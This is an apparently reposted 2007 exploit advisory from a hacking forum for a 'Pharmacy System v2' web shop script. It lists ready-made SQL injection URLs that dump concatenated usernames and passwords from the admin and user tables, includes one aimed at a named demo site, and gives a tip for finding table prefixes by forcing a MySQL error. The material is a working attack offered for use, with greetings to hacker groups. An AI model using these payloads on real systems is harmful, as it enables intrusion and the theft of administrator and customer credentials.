hex Posted June 24, 2007 Report Posted June 24, 2007 --==+================================================================================+==----==+ Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS +==----==+================================================================================+==--AUTHOR: t0pP8uZz & xprogSCRIPT DOWNLOAD: PAY SCRIPTSITE: http://www.netartmedia.net/pharmacysystem/DORK: N/AEXPLOITS:EXPLOIT 1: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_usersEXPLOIT 2: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_usersEXAMPLES:EXAMPLE ON DEMO: http://www.wscreator.com/pharma1/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_usersNOTE/TIP: Most sites will have diffrent table prefix, so table pharma1_admin_users probarly wont exist, to get the prefixfollow these steps, goto "http://server.com/index.php?page='" this should cause a mysql error and you will be able tosee the mysql query being used for the page variable. Simple replace the prefix from the error with then one in the injectionif you cant do that then dont use the exploit.GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net--==+================================================================================+==----==+ Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS +==----==+================================================================================+==-- # milw0rm.com [2007-06-24] Quote